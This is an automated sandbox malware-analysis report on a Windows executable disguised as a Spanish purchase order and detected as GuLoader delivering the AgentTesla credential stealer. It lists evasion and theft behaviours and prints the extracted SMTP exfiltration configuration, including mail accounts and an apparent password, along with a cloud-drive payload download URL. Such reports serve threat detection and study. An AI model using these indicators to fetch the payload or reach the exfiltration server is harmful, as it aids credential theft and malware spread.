Play interactive tour

Edit tour

Windows Analysis Report Orden de compra M244545.exe

Overview

General Information

Sample Name:	Orden de compra M244545.exe
Analysis ID:	1655
MD5:	7c04ecf5dc6999877e87cf9c1c933a3f
SHA1:	905c177e8ea3a2173e322c13b25cd156bd6dea39
SHA256:	cf7bd1c802c044a777529246743d3a5c907e4c02a29525afe2c48daee9b2fd9d
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected AgentTesla

Sigma detected: RegAsm connects to smtp port

Yara detected GuLoader

Hides threads from debuggers

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to steal Mail credentials (via file access)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Uses SMTP (mail sending)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to detect virtual machines (SGDT)

Classification

Process Tree

System is w10x64native

Orden de compra M244545.exe (PID: 4904 cmdline: 'C:\Users\user\Desktop\Orden de compra M244545.exe' MD5: 7C04ECF5DC6999877E87CF9C1C933A3F)

RegAsm.exe (PID: 7080 cmdline: 'C:\Users\user\Desktop\Orden de compra M244545.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

UserOOBEBroker.exe (PID: 5620 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "tamasfulop@csavarcsapagyexpress.huRozsnyoi42mail.csavarcsapagyexpress.huebuksebs@gmail.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2743474154.0000000002A90000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: RegAsm.exe PID: 7080	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 7080	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Overview

Networking:

Sigma detected: RegAsm connects to smtp port

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 185.111.89.226, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 7080, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49788

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: conhost.exe.2756.12.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "tamasfulop@csavarcsapagyexpress.huRozsnyoi42mail.csavarcsapagyexpress.huebuksebs@gmail.com"}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_01476E10 CryptUnprotectData,		11_2_01476E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_01477608 CryptUnprotectData,		11_2_01477608

Source: Orden de compra M244545.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.11.20:49781 version: TLS 1.2

Networking:

Source: Joe Sandbox View

ASN Name: WEBSUPPORT-SRO-SK-ASSK WEBSUPPORT-SRO-SK-ASSK

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=13CKgFgBbMK4vEbd75_G0jxF9OB9J4HBn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/6f93qthe57oar1vggbn97oksebnf1ht7/1634177700000/12448148553778765603/*/13CKgFgBbMK4vEbd75_G0jxF9OB9J4HBn?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-9g-docs.googleusercontent.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.11.20:49788 -> 185.111.89.226:587

Source: global traffic

TCP traffic: 192.168.11.20:49788 -> 185.111.89.226:587

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: RegAsm.exe, 0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 0000000B.00000002.7367144013.000000001E30C000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000003.3636304172.000000001CEC1000.00000004.00000001.sdmp	String found in binary or memory: http://VrVJ1YhyzX7x.net
Source: RegAsm.exe, 0000000B.00000002.7351446590.00000000014E8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: RegAsm.exe, 0000000B.00000003.2713472213.0000000001574000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsm.exe, 0000000B.00000002.7373463217.000000002042D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: RegAsm.exe, 0000000B.00000002.7373463217.000000002042D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: RegAsm.exe, 0000000B.00000003.2713472213.0000000001574000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 0000000B.00000002.7367262759.000000001E31C000.00000004.00000001.sdmp	String found in binary or memory: http://csavarcsapagyexpress.hu
Source: RegAsm.exe, 0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp	String found in binary or memory: http://hDFEly.com
Source: RegAsm.exe, 0000000B.00000002.7367262759.000000001E31C000.00000004.00000001.sdmp	String found in binary or memory: http://mail.csavarcsapagyexpress.hu
Source: RegAsm.exe, 0000000B.00000002.7351446590.00000000014E8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: UserOOBEBroker.exe, 00000011.00000002.7348570592.00000231B32F0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.microso
Source: RegAsm.exe, 0000000B.00000003.2718736619.00000000015BD000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RegAsm.exe, 0000000B.00000003.2713472213.0000000001574000.00000004.00000001.sdmp	String found in binary or memory: https://doc-14-9g-docs.googleusercontent.com/
Source: RegAsm.exe, 0000000B.00000002.7352395880.0000000001533000.00000004.00000020.sdmp	String found in binary or memory: https://doc-14-9g-docs.googleusercontent.com/My&
Source: RegAsm.exe, 0000000B.00000003.2718736619.00000000015BD000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7353219665.0000000001563000.00000004.00000020.sdmp, RegAsm.exe, 0000000B.00000003.2718804640.000000000156D000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7352998212.0000000001556000.00000004.00000020.sdmp	String found in binary or memory: https://doc-14-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/6f93qthe
Source: RegAsm.exe, 0000000B.00000002.7351446590.00000000014E8000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 0000000B.00000002.7351446590.00000000014E8000.00000004.00000020.sdmp, RegAsm.exe, 0000000B.00000002.7349796457.0000000001380000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000003.2713472213.0000000001574000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=13CKgFgBbMK4vEbd75_G0jxF9OB9J4HBn
Source: RegAsm.exe, 0000000B.00000002.7373463217.000000002042D000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: RegAsm.exe, 0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=13CKgFgBbMK4vEbd75_G0jxF9OB9J4HBn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/6f93qthe57oar1vggbn97oksebnf1ht7/1634177700000/12448148553778765603/*/13CKgFgBbMK4vEbd75_G0jxF9OB9J4HBn?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-9g-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.11.20:49781 version: TLS 1.2

Source: Orden de compra M244545.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\Orden de compra M244545.exe	Code function: 0_2_0040166E	0_2_0040166E
Source: C:\Users\user\Desktop\Orden de compra M244545.exe	Code function: 0_2_00401621	0_2_00401621
Source: C:\Users\user\Desktop\Orden de compra M244545.exe	Code function: 0_2_00401432	0_2_00401432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_01006B08	11_2_01006B08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_010007F8	11_2_010007F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_01044320	11_2_01044320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_01043A50	11_2_01043A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0104BA58	11_2_0104BA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0104C7B8	11_2_0104C7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_01043708	11_2_01043708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_01438C80	11_2_01438C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0143C710	11_2_0143C710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0143A318	11_2_0143A318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_01434EB0	11_2_01434EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_01431D28	11_2_01431D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_014341D1	11_2_014341D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_01435450	11_2_01435450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_01437F90	11_2_01437F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_014332A8	11_2_014332A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_014728D0	11_2_014728D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_014740B8	11_2_014740B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_01479B20	11_2_01479B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1D1A39D0	11_2_1D1A39D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1D1A3718	11_2_1D1A3718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1D1A0672	11_2_1D1A0672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1D1A7048	11_2_1D1A7048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1D1A39C8	11_2_1D1A39C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1D1A3808	11_2_1D1A3808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1D1AA760	11_2_1D1AA760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1D1A37E2	11_2_1D1A37E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1E065E08	11_2_1E065E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1E064ACC	11_2_1E064ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1E066AF1	11_2_1E066AF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0143AD10	11_2_0143AD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0143CCAF	11_2_0143CCAF

Source: Orden de compra M244545.exe, 00000000.00000002.2741140144.0000000000416000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameREMEMBERER.exe vs Orden de compra M244545.exe
Source: Orden de compra M244545.exe	Binary or memory string: OriginalFilenameREMEMBERER.exe vs Orden de compra M244545.exe

Source: C:\Users\user\Desktop\Orden de compra M244545.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: Orden de compra M244545.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Orden de compra M244545.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Orden de compra M244545.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Orden de compra M244545.exe 'C:\Users\user\Desktop\Orden de compra M244545.exe'
Source: C:\Users\user\Desktop\Orden de compra M244545.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Orden de compra M244545.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Source: C:\Users\user\Desktop\Orden de compra M244545.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Orden de compra M244545.exe'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Orden de compra M244545.exe

File created: C:\Users\user\AppData\Local\Temp\~DFDD48C8497AFF8384.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@5/1@3/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:304:WilStaging_02

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.2743474154.0000000002A90000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Orden de compra M244545.exe	Code function: 0_2_004059C4 push AEED1A63h; ret		0_2_004059CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_1D1A0380 push eax; ret		11_2_1D1A0381

Source: C:\Users\user\Desktop\Orden de compra M244545.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
